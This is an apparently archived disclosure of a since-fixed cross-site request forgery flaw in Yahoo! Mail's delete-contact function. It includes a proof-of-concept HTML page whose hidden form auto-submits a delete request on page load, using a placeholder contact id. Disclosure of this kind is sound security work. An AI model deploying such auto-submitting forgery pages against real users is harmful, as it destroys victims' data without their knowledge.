Yahoo! Mail suffered from a delete contact cross site request forgery vulnerability. This has been fixed.
6191f8ef9a72738b6a664e4cd904c4670fc2e72782c56cc9a39193bf2f791fb9
=======================================================================
YAHOOMAIL CSRF Vulnerability
=======================================================================
# Vulnerability found in- Yahoomail Delete Contact module
# email prakhar.agrawal26@gmail.com
# company AKS IT Services Pvt. Ltd
# Credit by Prakar Agrawal
# Email Service Yahoomail
# Category Mail service
# Site p4ge http://www.yahoomail.com
# Plateform java
# Proof of concept #
Targeted URL: http://address.mail.yahoo.com/
Script to Delete the contacts from contact list through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
<input type=hidden name="action" value="delete_contacts">
<input type=hidden name="id" value="$Numeric No.$">
</form>
<script>document.csrf.submit();</script>
</body>
</html>
. ..................................................................................................................
Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....
# If you have any questions, comments, or concerns, feel free to contact me.